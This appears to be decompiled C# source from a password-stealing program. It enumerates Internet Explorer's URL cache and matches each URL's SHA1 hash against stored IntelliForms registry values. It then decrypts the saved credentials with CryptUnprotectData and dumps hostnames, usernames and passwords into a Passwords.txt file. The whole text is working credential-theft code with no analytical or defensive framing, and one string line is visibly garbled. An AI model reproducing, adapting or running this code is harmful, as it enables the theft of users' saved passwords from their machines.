// Token: 0x060000BE RID: 190 RVA: 0x00009404 File Offset: 0x00007604
public static void Start()
{
int num = 0;
Internet_Explorer.FindFirstUrlCacheEntry(null, IntPtr.Zero, ref num);
if (Marshal.GetLastWin32Error() != 259)
{
int num2 = num;
IntPtr intPtr = Marshal.AllocHGlobal(num2);
try
{
IntPtr hEnumHandle = Internet_Explorer.FindFirstUrlCacheEntry(null, intPtr, ref num);
bool flag;
do
{
string text = ((Internet_Explorer.INTERNET_CACHE_ENTRY_INFO)Marshal.PtrToStructure(intPtr, typeof(Internet_Explorer.INTERNET_CACHE_ENTRY_INFO))).lpszSourceUrlName.ToLower();
text = text.Substring(text.IndexOf("@") + 1);
if (text.IndexOf("?") > 0)
{
text = text.Substring(0, text.IndexOf("?"));
}
string sha1Hash = Internet_Explorer.GetSHA1Hash(text, (text.Length + 1) * 2);
byte[] array = (byte[])Registry.CurrentUser.OpenSubKey(Internet_Explorer.IE_KEY).GetValue(sha1Hash, null);
if (array != null)
{
if (!Internet_Explorer.visited.Contains(text))
{
Internet_Explorer.DecryptCredential(text, sha1Hash, array.Length, array);
Internet_Explorer.visited = Internet_Explorer.visited + text + " ";
}
}
else
{
text += "/";
string sha1Hash2 = Internet_Explorer.GetSHA1Hash(text, (text.Length + 1) * 2);
byte[] array2 = (byte[])Registry.CurrentUser.OpenSubKey(Internet_Explorer.IE_KEY).GetValue(sha1Hash2, null);
if (array2 != null && !Internet_Explorer.visited.Contains(text))
{
Internet_Explorer.DecryptCredential(text, sha1Hash2, array2.Length, array2);
Internet_Explorer.visited = Internet_Explorer.visited + text + " ";
}
}
num = num2;
flag = Internet_Explorer.FindNextUrlCacheEntry(hEnumHandle, intPtr, ref num);
if ((flag || Marshal.GetLastWin32Error() != 259) && !flag && num > num2)
{
num2 = num;
IntPtr cb = new IntPtr(num2);
intPtr = Marshal.ReAllocHGlobal(intPtr, cb);
flag = true;
}
}while (flag);
}
finally
{
Marshal.FreeHGlobal(intPtr);
}
}
}
// Token: 0x060000BD RID: 189 RVA: 0x0000931C File Offset: 0x0000751C
public static string GetSHA1Hash(string pbData, int length)
{
IntPtr hHash = 0;
IntPtr hProv = 0;
byte[] array = new byte[21];
string text = "";
int num = 20;
Internet_Explorer.CryptAcquireContext(ref hProv, null, null, 1U, 0U);
Internet_Explorer.CryptCreateHash(hProv, 32772U, IntPtr.Zero, 0U, ref hHash);
Internet_Explorer.CryptHashData(hHash, Internet_Explorer.VarPtr(pbData), length, 0U);
Internet_Explorer.CryptGetHashParam(hHash, 2, array, ref num, 0);
Internet_Explorer.CryptDestroyHash(hHash);
Internet_Explorer.CryptReleaseContext(hProv, 0U);
int i = 0;
while (i < 20)
{
text += Strings.Right("00" + array[i].ToString("X"), 2);
Math.Max(Interlocked.Increment(ref i), i - 1);
}
return(text + Strings.Right("00" + Internet_Explorer.CheckSum(text).ToString("X"), 2));
}
// Token: 0x060000B9 RID: 185 RVA: 0x00009020 File Offset: 0x00007220
public static void DecryptCredential(string sURL, string sHash, int Length, byte[] data)
{
List <string[]> list = new List <string[]>();
Internet_Explorer.DATA_BLOB data_BLOB = default(Internet_Explorer.DATA_BLOB);
Internet_Explorer.DATA_BLOB data_BLOB2 = default(Internet_Explorer.DATA_BLOB);
Internet_Explorer.DATA_BLOB data_BLOB3 = default(Internet_Explorer.DATA_BLOB);
Internet_Explorer.StringIndexHeader stringIndexHeader = default(Internet_Explorer.StringIndexHeader);
Internet_Explorer.StringIndexEntry stringIndexEntry = default(Internet_Explorer.StringIndexEntry);
IntPtr intPtr = Marshal.AllocHGlobal(Length);
Marshal.Copy(data, 0, intPtr, Length);
data_BLOB.cbData = Length;
data_BLOB.pbData = intPtr;
data_BLOB3.cbData = (sURL.Length + 1) * 2;
data_BLOB3.pbData = Internet_Explorer.VarPtr(sURL);
if (Internet_Explorer.CryptUnprotectData(ref data_BLOB, 0, ref data_BLOB3, 0, 0, 0, ref data_BLOB2))
{
IntPtr ptr = new IntPtr(data_BLOB2.pbData.ToInt32() + (int)Marshal.ReadByte(data_BLOB2.pbData));
stringIndexHeader = (Internet_Explorer.StringIndexHeader)Marshal.PtrToStructure(ptr, stringIndexHeader.GetType());
if (stringIndexHeader.dwType == 1 && stringIndexHeader.dwEntriesCount >= 2)
{
IntPtr ptr2 = new IntPtr(ptr.ToInt32() + stringIndexHeader.dwStructSize);
IntPtr intPtr2 = new IntPtr(ptr2.ToInt32() + stringIndexHeader.dwEntriesCount * Marshal.SizeOf <Internet_Explorer.StringIndexEntry>(stringIndexEntry));
int num = 0;
while ((double)num < (double)stringIndexHeader.dwEntriesCount / 2.0)
{
if (num != 0)
{
ptr2 = new IntPtr(ptr2.ToInt32() + Marshal.SizeOf <Internet_Explorer.StringIndexEntry>(stringIndexEntry));
}
stringIndexEntry = (Internet_Explorer.StringIndexEntry)Marshal.PtrToStructure(ptr2, stringIndexEntry.GetType());
IntPtr ptr3 = new IntPtr(intPtr2.ToInt32() + stringIndexEntry.dwDataOffset);
string text = Marshal.PtrToStringAuto(ptr3);
ptr2 = new IntPtr(ptr2.ToInt32() + Marshal.SizeOf <Internet_Explorer.StringIndexEntry>(stringIndexEntry));
stringIndexEntry = (Internet_Explorer.StringIndexEntry)Marshal.PtrToStructure(ptr2, stringIndexEntry.GetType());
ptr3 = new IntPtr(intPtr2.ToInt32() + stringIndexEntry.dwDataOffset);
string text2 = Marshal.PtrToStringAuto(ptr3);
string[] item = new string[]
{
sURL,
text,
text2,
"Internet Explorer"
};
list.Add(item);
Math.Max(Interlocked.Increment(ref num), num - 1);
}
}
string str = Program.path + "\\";
foreach (string[] array in list)
{
Directory.CreateDirectory(str + array[3]);
using (StreamWriter streamWriter = new StreamWriter(str + array[3] + "\\Passwords.txt", true))
{
streamWriter.WriteLine(string.Concat(new string[]
{
"\n[PASSWORD]\nHostname: ",
array[0],
"\nUsername: "******"\nPassword: ",
array[2]
}));
}
}
}
}
